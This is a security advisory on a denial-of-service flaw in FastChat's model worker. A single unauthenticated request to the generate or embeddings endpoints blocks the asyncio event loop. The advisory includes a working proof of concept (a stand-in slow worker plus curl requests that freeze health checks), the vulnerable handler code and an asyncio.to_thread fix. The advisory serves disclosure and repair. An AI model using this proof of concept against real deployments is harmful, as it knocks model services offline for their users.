# Vulnerability Summary: Blocking Event Loop in FastChat Model Worker Leads to Denial of Service

## Vulnerability Overview

**Title**: Denial of Service via Blocking Event Loop in Model Worker (Incomplete Fix for ff66426)

**Description**: A single unauthenticated HTTP request to `/worker_generate` or `/worker_get_embeddings` can freeze a FastChat model worker for the entire duration of inference. While the event loop is blocked, no other requests (heartbeats, health checks, requests from other users) can be processed. The worker denies service and is eventually deregistered by the controller.

**Root Cause**: The `async def` request handlers call the synchronous, long-running methods `worker.generate_gate()` and `worker.get_embeddings()` directly, so the asyncio event loop cannot run anything else until inference returns. Commit `ff66426` fixed this for `api_generate()` in `base_model_worker.py`, but three other instances of the same bug were overlooked.

## Impact Scope

- **Affected Product**: FastChat (pip package)
- **Affected Versions**: <= 0.2.36 (latest version at reporting time, commit `5a85c5f`)
- **Severity**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
- **CWE**: CWE-400: Uncontrolled Resource Consumption

**Specific Impacts**:

1. Single-request freeze: one HTTP request stalls the entire model worker, and no other requests are processed during inference (seconds to minutes).
2. Heartbeat disruption: the blocked event loop prevents heartbeat responses, so the controller deregisters the worker and all models it serves become unavailable to users.
3. Cross-model cascade: in `multi_model_worker` deployments, all models served by the affected worker are impacted simultaneously.
4. Sustained DoS: a continuous stream of blocking requests keeps the worker permanently frozen.
5. No authentication required: the worker endpoints (`/worker_generate`, `/worker_get_embeddings`) are not protected by an API key.

## Remediation

Wrap the synchronous calls in `asyncio.to_thread()` so the blocking work runs in the thread pool instead of on the event loop:

```python
import asyncio

# Fix: offload the blocking calls to the default thread pool
output = await asyncio.to_thread(worker.generate_gate, params)
embedding = await asyncio.to_thread(worker.get_embeddings, params)
```

## POC Code

### Full Exploitation Code

```bash
cd /path/to/FastChat
python3 -c "
import sys, time, uvicorn
sys.path.insert(0, '.')
import fastchat.serve.base_model_worker as bmw

# Stand-in worker: sleeps for 10 seconds instead of running inference
class SlowWorker:
    def __init__(self):
        self.model_names = ['test-model']
        self.limit_worker_concurrency = 5
        self.semaphore = None
        self.context_len = 4096

    def get_status(self):
        return {'model_names': self.model_names, 'speed': 1, 'queue_length': 0}

    def generate_gate(self, params):
        time.sleep(10)
        return {'text': 'done', 'error_code': 0}

    def get_embeddings(self, params):
        time.sleep(10)
        return {'embedding': [[0.1, 0.2, 0.3]], 'token_num': 3}

bmw.worker = SlowWorker()
bmw.logger = __import__('logging').getLogger('test')
uvicorn.run(bmw.app, host='0.0.0.0', port=21002)
" &
sleep 2  # give the server time to start
```

### Exploitation Step Code

**Step 3 - Exploit vulnerable endpoint `/worker_get_embeddings` (line 218):**

```bash
# Terminal A: send a blocking embedding request
curl -s -X POST http://localhost:21002/worker_get_embeddings \
  -H "Content-Type: application/json" \
  -d '{"input":["test"]}' &

# Terminal B (within 1 second): try a health check
time curl -s -X POST http://localhost:21002/worker_get_status \
  -H "Content-Type: application/json" -d '{}'
```

With the blocking call in place, the health check should return only after the 10-second sleep in `SlowWorker.get_embeddings` finishes.

**Step 4 - Verify fixed endpoint `/worker_generate` (line 209) is not blocked:**

```bash
# Terminal A: send a generate request (this endpoint was fixed in ff66426)
curl -s -X POST http://localhost:21002/worker_generate \
  -H "Content-Type: application/json" \
  -d '{"prompt":"test"}' &

# Terminal B (within 1 second): try a health check
time curl -s -X POST http://localhost:21002/worker_get_status \
  -H "Content-Type: application/json" -d '{}'
```

Because this handler already offloads the call, the health check should return without waiting for the generate request.

### Original Vulnerable Code Snippets

**Location 1 - `multi_model_worker.py` `api_generate()` (line 112):**

```python
@app.post("/worker_generate")
async def api_generate(request: Request):
    params = await request.json()
    await acquire_worker_semaphore()
    worker = worker_map[params["model"]]
    output = worker.generate_gate(params)  # BLOCKS event loop
    release_worker_semaphore()
    return JSONResponse(output)
```

**Location 2 - `base_model_worker.py` `api_get_embeddings()` (line 218):**

```python
@app.post("/worker_get_embeddings")
async def api_get_embeddings(request: Request):
    params = await request.json()
    await acquire_worker_semaphore()
    embedding = worker.get_embeddings(params)  # BLOCKS event loop
    release_worker_semaphore()
    return JSONResponse(content=embedding)
```

**Location 3 - `huggingface_api_worker.py` `api_generate()` (line 236):**

```python
@app.post("/worker_generate")
async def api_generate(request: Request):
    params = await request.json()
    worker = worker_map[params["model"]]
    await acquire_worker_semaphore(worker)
    output = worker.generate_gate(params)  # BLOCKS event loop
    release_worker_semaphore(worker)
    return JSONResponse(output)
```
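The blocking behavior in the three handlers above can be reproduced without FastChat or a web server. The following is a minimal stdlib-only sketch, not FastChat code: `slow_generate`, `vulnerable_handler`, `fixed_handler`, `status_latency`, and `BLOCK_SECONDS` are hypothetical names chosen for illustration. It measures how long a trivial coroutine (standing in for a `/worker_get_status` request) has to wait while a handler runs, first with the direct call and then with `asyncio.to_thread()`.

```python
import asyncio
import time

BLOCK_SECONDS = 0.5  # hypothetical stand-in for inference time


def slow_generate(params):
    """Synchronous stand-in for worker.generate_gate(); sleeps instead of running a model."""
    time.sleep(BLOCK_SECONDS)
    return {"text": "done", "error_code": 0}


async def vulnerable_handler(params):
    # Direct call: the event loop thread is stuck inside time.sleep().
    return slow_generate(params)


async def fixed_handler(params):
    # Offloaded call: the event loop stays free while a pool thread sleeps.
    return await asyncio.to_thread(slow_generate, params)


async def status_latency(handler):
    """Run `handler` concurrently and time a 10 ms coroutine competing with it."""
    start = time.perf_counter()
    task = asyncio.create_task(handler({"prompt": "test"}))
    await asyncio.sleep(0.01)  # stand-in for a lightweight status request
    latency = time.perf_counter() - start
    await task  # let the handler finish before returning
    return latency


async def main():
    blocked = await status_latency(vulnerable_handler)
    offloaded = await status_latency(fixed_handler)
    return blocked, offloaded


if __name__ == "__main__":
    blocked, offloaded = asyncio.run(main())
    print(f"direct call:       status waited {blocked:.2f}s")
    print(f"asyncio.to_thread: status waited {offloaded:.2f}s")
```

In the direct-call case the status coroutine cannot resume until `slow_generate` returns, so its latency is at least `BLOCK_SECONDS`; in the offloaded case it resumes as soon as its own 10 ms timer fires. Note that `asyncio.to_thread()` was added in Python 3.9; on older interpreters, `loop.run_in_executor(None, func, *args)` is the usual equivalent.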